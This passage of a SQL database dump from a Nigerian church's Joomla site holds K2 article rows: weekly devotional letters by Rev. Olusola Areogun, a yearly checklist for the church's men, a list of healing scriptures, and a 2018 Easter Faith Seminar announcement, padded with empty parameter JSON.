'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(54, 'Divine Agenda for Dream Centre Men', 'divine-agenda', 2, 1, '<p>Every dream centre man should: </p>\r\n<p class=\"MsoNormal\">1. Build their house</p>\r\n<p class=\"MsoNormal\">2. Pay off all debts</p>\r\n<p class=\"MsoNormal\">3. Have a saving equivalent to 6 months’ salary</p>\r\n', '\r\n<p class=\"MsoNormal\">4. Establish an NGO to influence a segment of the society for Christ</p>\r\n<p class=\"MsoNormal\">5. Become a family unit leader</p>\r\n<p class=\"MsoNormal\">6. Win a minimum of 12 souls personally to Christ in the year and added to church</p>\r\n<p class=\"MsoNormal\">7. Complete MIMMP this year</p>\r\n<p class=\"MsoNormal\">8. Don’t miss a bible study service in the year without a genuine reason</p>\r\n<p class=\"MsoNormal\">9. Attend 52 Sunday services</p>\r\n<p class=\"MsoNormal\">10. Provide quality leadership for your family</p>\r\n<p class=\"MsoNormal\">11. Establish at least one additional stream of income apart from salary current source</p>\r\n<p class=\"MsoNormal\">12. Take your spouse out for a fun weekend away from home</p>\r\n<p class=\"MsoNormal\">13. Pray at least one hour a day</p>\r\n<p class=\"MsoNormal\">14. Read through the bible in the year</p>\r\n<p class=\"MsoNormal\">15. Don’t miss a tithe</p>\r\n<p class=\"MsoNormal\">16. Acquire an additional skill this year</p>\r\n<p> </p>\r\n<p class=\"MsoNormal\">17. Be a part of Head Quarter building in cash and in kind till finishing.</p>', NULL, NULL, '[]', '', '2017-07-04 20:22:52', 196, '', 0, '0000-00-00 00:00:00', '2017-07-16 10:01:55', 196, '2017-07-04 20:22:52', '0000-00-00 00:00:00', 0, 1, 19, 0, 0, '', '', '', '', 4562, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(55, 'Keep your appointments daily with God - From our Father\'s Heart (16/07/2017)', 'divine-appointment', 5, 1, '<p>Dearly Beloved,</p>\r\n<p>Keep your appointments daily with God. Those who keep their appointments with God have far more supernatural encounters and experiences than those who don’t. As a believer, the greatest battle you will face will be the battle to keep your personal appointments with God.</p>\r\n', '\r\n<p>The devil knows that if you keep your appointments with God, you will become undefeatable for him. There is an anointing that comes upon you when you personally and consistently fellowship with God and the enemy can’t beat that anointing.</p>\r\n<p>The busier you become, the more time you must spend with God. The plan of the devil is to make you so busy that you cannot even have time for God , so that when he shows up in your life, you will not be ready for him.</p>\r\n<p>There is the place of corporate fellowship, however there is the unquestionable and irreplaceable need for a personal time with God in prayer and Bible study that produces stability in your life. You get the most of corporate meetings if you make out time for personal and private meditation and fellowship with God.</p>\r\n<p>This issue seems so foundational but it is one of those things you must guard jealously if you will go far with God. Whenever I see anyone who trivializes his personal appointment and fellowship with God, I know that man will not go far with God except he changes.</p>\r\n<p>Maturity of a believer is not measured or seen in the manifestation of the gifts of the Spirit, but in character development and character is built in the place of fellowship with God. If you get so busy during the day, take time out in the night to keep your appointment with God. Don’t let the devil sponsor you out of divine relevance by giving you satanic open doors that will turn you into a dense and weak Christian.</p>\r\n<p>People who have power with God take time in the watches of the night to keep divine appointments. Jacob had to wrestle with God alone all through the night before he had power with God. He kept that critical appointment with God which changed his entire life and destiny.</p>\r\n<p>Mark 1 verse 35 says “ And in the morning, rising up a great while before day, he went out, and departed into a solitary place, and there prayed”.</p>\r\n<p>Everyone that grew to be a giant of God, both in this generation and in the past, everyone that is doing exploits for God now, everyone that has been consistent in the Christian race, be it a pulpit minister or help minister, all of them have one thing in common which is the source of their strength and achievements, that is the time they spend in the closet with the Lord alone, either deep into the night or early in the morning hours when the day is yet to come. Those personal time with the Lord have been responsible for making them to be men of worth, men of substance and men of violence forcefully advancing the course of the Father’s kingdom.</p>\r\n<p>Take heed to your personal appointment with the Lord and it shall be well with you in Jesus’ name.</p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s Servant,</p>\r\n<p>Rev. Olusola Areogun. </p>', NULL, NULL, '[]', '', '2017-07-16 09:55:43', 199, '', 0, '0000-00-00 00:00:00', '2017-07-16 10:11:32', 196, '2017-07-16 09:55:43', '0000-00-00 00:00:00', 0, 1, 26, 0, 0, '', '', '', '', 7462, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(56, 'Don\'t serve God carelessly - From our Father\'s Heart (02/07/2017)', 'don-t-serve-god-carelessly-from-our-father-s-heart-02-07-2017', 5, 1, '<p>Dearly Beloved,</p>\r\n<p>Jeremiah 48 vs 10 says “ Cursed be he that doeth the work of the Lord deceitfully, and cursed be he that keepeth back his sword from blood.”</p>\r\n', '\r\n<p>God is a God of excellence and order. He does not accept just anything. Serving God has principles, precepts and standard. So, don’t serve Him anyhow. One of the first truths stated in the Bible is the standard of service that God accepts. God hates to be served anyhow. That was what separated Cain from Abel. God accepted Abel’s offering and rejected Cain’s because of the standard and attitude with which they came to God.</p>\r\n<p>You need to know that any service not up to divine standards generates the wrath of God. God loves us but He will never accept wrong and mediocre service from any man. God always wants the best.</p>\r\n<p>It is better not to serve God than to serve Him anyhow. God wants us to serve Him but not at our own standard. Not at your own time but His, not at your own convenience but at His demands. Bring excellence and honour into your service. Any service that you are bringing to God either spiritual or physical must come with honour.</p>\r\n<p>The Lord told me years ago “ My son I am a serious God, if you take me serious, I will take you serious”. Your service must come to God at the highest level of seriousness.</p>\r\n<p>God does not accept careless attitude in service. The two sons of Aaron understood that in a very costly way. They brought strange fire into His presence and He smote them. God is a God of details and specifics. He gives details and specifics of how He wants men to serve Him. Don’t serve God carelessly.</p>\r\n<p>Deut. 10 vs 12 says “ And now Israel, what doth the LORD thy God require of thee, but to fear the LORD thy God, to walk in all his ways, and to love him, and to serve the LORD thy God with all thy heart and with all thy soul.” God wants men to serve him with all their heart and soul. Don’t join the group of people that serve God as if they are doing Him a favour. Serve Him with all your possession and every capacity that He has given you.</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-07-16 10:11:34', 199, '', 0, '0000-00-00 00:00:00', '2017-07-16 10:15:11', 196, '2017-07-16 10:11:34', '0000-00-00 00:00:00', 0, 1, 27, 0, 0, '', '', '', '', 6051, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(57, 'ARE YOU SENDABLE? From our Father\'s Heart (13/08/2017)', 'are-you-sendable-from-our-father-s-heart-13-08-2017', 5, 1, '<p>FROM THE FATHER’S HEART</p>\r\n<p>Dearly Beloved,<br />ARE YOU SENDABLE? There are 3 LABELS God put on you at GOBC 2017;<br />i DIVINE DELEGATES ii GOD’S SPECIAL FORCES iii A SENT MAN. <br />You must carry the consciousness of this from today. God wants me to ask you, are you part of the sendable men? Isaiah 6 verse 8 says “ Also I heard the voice of the Lord, saying, Whom shall I send, and who will go for us? Then said I, Here am I; send me.”</p>\r\n', '\r\n<p>Men that are sendable are those that have had an encounter with the Lord. One of the things God came to do during the convention is not just that He came to bless us but He came to commission us. God has come to recruit the carriers of His Glory. Will you tell the Lord today, HERE AM I, SEND ME! Let the Lord hear you say that.<br /> In our world today, there are different happenings that call for sendable men. For example, in the U.K. of today, for every Christian convert, 26 Christians leave the church. That is how bad the devil has taken over in Europe, and God is asking, Who shall I send, and Who will go for us? Muhammad Gaddafi said “By the grace of their god, they will not need to fire a bullet to take over Europe , in the next 20-30 years, there will be more muslims than Christians .” God is asking WHO CAN WE SEND? Not every human being is sendable!<br />I was minding my business planning to become a professor of electronics when the Lord came to me and said, “ I am sending you to Ijeshaland, a town in Osun State, Nigeria, to rescue young people whose ancestors have stirred up my anger through evil, occultic practices over the years” and I obeyed and went there. When we got there, people were wondering, how could young people like us come to such a place. I faced serious oppositions when I started the ministry, but I told them, the only way you will be able to overcome me is if you can overcome the one who sent me. A sent man didn’t send himself, he has a MESSAGE, a SENDER, and DIVINE BACKING of Who sent him. You are no longer an ordinary man except you make yourself one.<br />There is a power of sending that God wants you to understand. If He sends you to the world of intellectuals, He will give you something they cannot withstand. He equips you for your assignment. Some of you, God is sending you back to your family. When I got born again, God sent me back to my family and He showed me the revelation of my family and how things had been done wrongly before then. I took over, and from that point on, things took a new turn because someone was sent to his family. Some of you, God is sending you back to your state, your office, your vicinity to influence the world around you for Jesus. Many people do not understand the power of a sent man in the land where God has placed them. God does not reckon with the politicians in the land, He reckons with His people whom He has called and sent. Anytime there is a breakdown of law and order in a land, the watchmen over the land have stopped watching over the town. I challenge you today to take up this mandate. God is looking for somebody, and you have been equipped, NOW GO!<br />Till next week, go and win with Jesus.<br />God’s Servant,<br />Rev. Olusola Areogun.</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-08-12 19:04:18', 199, '', 0, '0000-00-00 00:00:00', '2017-10-02 10:07:40', 196, '2017-08-12 19:04:18', '0000-00-00 00:00:00', 0, 1, 28, 0, 0, '', '', '', '', 2356, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(58, 'Victory over ulcers and heicobater pylori bacteria SCRIPTURES', 'victory-over-ulcers-and-heicobater-pylori-bacteria-scriptures', 1, 1, '<p>Victory over ulcers and heicobater pylori bacteria SCRIPTURES </p>\r\n<p>Psalm 18:45</p>\r\n<p>Isaiah 49:26</p>\r\n<p>Jer 30:16</p>\r\n<p>Jer 33:6</p>\r\n<p>Jer 30:17</p>\r\n<p> </p>', '', NULL, NULL, '[]', '', '2017-10-02 10:07:50', 200, '', 0, '0000-00-00 00:00:00', '2017-12-28 12:40:19', 196, '2017-10-02 10:07:50', '0000-00-00 00:00:00', 0, 1, 1, 0, 0, '', '', '', '', 1966, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(59, '2018 ANNUAL EASTER FAITH SEMINAR', '2018-annual-easter-faith-seminar', 2, 1, '<p>Beloved of God, </p>\r\n<p>Greetings of love in Jesus name.We cordially invite you, your friends and family to the 2018 ANNUAL EASTER FAITH SEMINAR coming up 29TH MARCH - 1ST APRIL, 2018.</p>\r\n<p>There will be six powerful sessions for this edition of Easter Faith Seminar:</p>\r\n<p><strong>Thursday</strong> | 29.03.2018</p>\r\n<p>First Session: 5pm - 9pm</p>\r\n<p><strong>Friday</strong> | 30.03.2018</p>\r\n<p>Second Session: 8am - 2pm</p>\r\n<p>Third Session: 5pm - 9pm</p>\r\n<p><strong>Saturday</strong> | 31.03.2018</p>\r\n<p>Fourth Session: 8am - 12noon</p>\r\n<p>Fifth Session Session: 5pm - 9pm</p>\r\n<p><strong>Sunday</strong> | 01.04.2018</p>\r\n<p>Sixth Session: 8am - 12noon</p>\r\n<p><strong>Venue:</strong> </p>\r\n<p>The Dream Centre Headquaters Km 4 gbongan/osogbo expressway, Dream centre bus stop - Osogbo, Osun State.</p>\r\n<p><strong>Joining us to minister are</strong></p>\r\n<p>Rev Akinlolu Raphael (World Harvest Network Int\'l. Ibadan, Oyo State) | Pastor Tunde Jayebo (Charis Family Int\'l Church. Ibadan, Oyo State)</p>\r\n<p>There will be a SPECIAL MARRIAGE SEMINAR FOR ALL SINGLES on Saturday, 31st of March 2018 between 8am-12noon</p>\r\n<p><strong>For Enquiries call</strong></p>\r\n<p>+23407060930809</p>\r\n<p>+234 803 849 2153</p>\r\n<p>+234 803 725 2124</p>\r\n<p> </p>\r\n<p><strong>You can also join all sessions online via the following media:</strong></p>\r\n<p>YouTube: <a href=\"http://www.lifeoasisinternationalchurch.org/streaming\">www.lifeoasisinternationalchurch.org/streaming</a> </p>\r\n<p>Radio: <a href=\"http://www.dciradio.org\">www.dciradio.org</a> </p>\r\n<p>Facebook &amp; Twitter: @ReverendAreogun</p>\r\n<p> </p>\r\n<p>Come, All things are ready!</p>\r\n<p>JESUS is LORD!!</p>', '', NULL, NULL, '[]', '', '2018-03-26 13:05:55', 196, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, '2018-03-26 13:05:55', '0000-00-00 00:00:00', 0, 1, 20, 0, 0, '', '', '', '', 2873, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor